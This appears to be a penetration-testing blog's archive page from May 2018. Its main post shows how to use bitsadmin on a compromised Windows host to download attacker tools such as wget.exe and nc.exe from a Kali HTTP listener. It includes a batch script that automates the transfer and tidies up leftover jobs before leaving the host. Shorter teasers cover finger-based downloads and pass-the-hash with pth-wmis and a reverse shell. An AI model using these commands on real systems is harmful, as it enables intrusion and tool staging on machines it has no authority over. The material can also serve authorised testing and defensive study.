
Posts

Showing posts from May, 2018

Use bitsadmin For File Transfer

On Kali: set up an HTTP listener in a directory from which wget.exe can be fetched. BITS asks the server for the file size with a HEAD request before it downloads, so the listener must answer HEAD with a Content-Length header; Python's built-in server does.

  cd /usr/share/windows-binaries/
  python -m SimpleHTTPServer 80

(On a Python 3 only system the equivalent is python3 -m http.server 80.)

On Windows: create or change to a directory where the current user has permission to create files:

  mkdir \temp
  cd \temp

Get the wget.exe file. bitsadmin requires a fully qualified local path for the destination, which is why %cd% is used rather than a bare file name:

  set HOSTIP=10.0.0.22
  cmd /c "bitsadmin /transfer wcb /priority foreground http://%HOSTIP%/wget.exe %cd%\wget.exe"

Tested and working on default installs of:

  Windows Vista 32 bit
  Windows Vista 64 bit
  Windows Server 2008 Standard SP1 32 bit
  Windows 7 SP1 32 bit
  Windows 7 SP1 64 bit
  Windows 8 32 bit
  Windows 8 64 bit
  Windows Server 2012 64 bit

It did not work on Windows versions prior to Vista. bitsadmin is deprecated in favour of the BITS PowerShell cmdlets and did not work on Windows 10 in this test; the bitsadmin.exe binary nonetheless still ships with Windows 10, so it is worth trying on the target before falling back to another method. Note also that every job it creates is recorded in the Microsoft-Windows-Bits-Client/Operational event log, so the transfer is visible to anyone watching that log.
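The single bitsadmin /transfer line in this post works for one file but gives no feedback in a blind shell when the download fails, and a failed /transfer leaves its job queued and retrying in the background. The following batch script is an added example, not code from the original post: it pulls one or more files from the HTTP listener the post describes, verifies that each one landed, cancels the job when it did not, and lists any leftover jobs. The script name get.cmd, the job naming scheme and the nc.exe file in the usage line are assumptions for illustration.

```batch
@echo off
rem get.cmd - added example (not the original post's script): fetch one or more
rem files from the Kali HTTP listener with bitsadmin and verify that each arrived.
rem Assumptions: the listener IP is the first argument; the remaining arguments are
rem file names served from the listener's directory (e.g. wget.exe, nc.exe).
setlocal enabledelayedexpansion
if "%~2"=="" (
  echo usage: %~nx0 hostip file [file ...]
  exit /b 1
)
set HOSTIP=%~1
shift
rem bitsadmin insists on a fully qualified local path, so resolve it once here
set DEST=%cd%
set RC=0

:next
if "%~1"=="" goto done
set FILE=%~1
rem /transfer blocks and prints progress until the job completes or fails
bitsadmin /transfer "bits_!FILE!" /priority foreground "http://%HOSTIP%/!FILE!" "%DEST%\!FILE!"
if exist "%DEST%\!FILE!" (
  for %%F in ("%DEST%\!FILE!") do echo OK   !FILE! %%~zF bytes
) else (
  echo FAIL !FILE!
  rem a failed /transfer leaves the job queued and retrying in the background; drop it
  bitsadmin /cancel "bits_!FILE!" >nul 2>&1
  set RC=1
)
shift
goto next

:done
rem anything still listed here is a leftover job worth cancelling before leaving the host
bitsadmin /list
exit /b %RC%
```

Usage from the \temp directory created earlier: get.cmd 10.0.0.22 wget.exe nc.exe. The exit code is 0 only when every file is present, so the script can be chained with && into the next step of the procedure. Once wget.exe is on the box, later files are simpler to fetch with wget itself; this script is for the stage before that.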

Use Finger To Download

Today I saw a Twitter post by @DissectMalware about using finger to download data. I thought I would try it and see if I could find a good purpose for it (it is limited to textual data). One annoying thing I run into is file transfer to a Windows host that has neither a TFTP client nor PowerShell. The usual solution is to paste in a 25-line VBScript. This wouldn't be so bad, but usually I find I am restricted on a shell to pasting in at most 5 lines at a time, and sometimes even fewer, before the resulting script gets corrupted. The only way to know whether the script was pasted successfully is to print it back with type and examine all 25 lines (if they all made it into the file). Just running the script without knowing it is correct risks losing the shell; I have hung my shell more than once. By the way, don't bother trying the FTP client. The challenge is more than just having to create a script file so you can run it non-interactively. Besides having Windows Def

pth-wmis and Combined PowerShell and CMD Reverse Shell

Useful Background:
  http://passing-the-hash.blogspot.ca/2013/04/missing-pth-tools-writeup-wmic-wmis-curl.html
  http://passing-the-hash.blogspot.ca/2013/07/WMIS-PowerSploit-Shells.html

Resource: Combined PowerShell and CMD Reverse Shell

Purpose: Test the use of the "Combined PowerShell and CMD Reverse Shell" together with the Pass-The-Hash version of wmis (pth-wmis).

Disclaimer: These scripts are provided for educational purposes only and for use by ethical hackers. Use them only on systems for which you have acquired all the legally required contracts and permissions. It is your responsibility to determine whether you are legally permitted to use these scripts in your country and for your purposes. No warranty or guarantees are provided.

Attacking Box: 32-bit Offsec VM - Kali
Target Box: Windows 7 Professional Service Pack 1

We Have A Hash

From another compromised box on the same network we have captured the local Administrator's hash: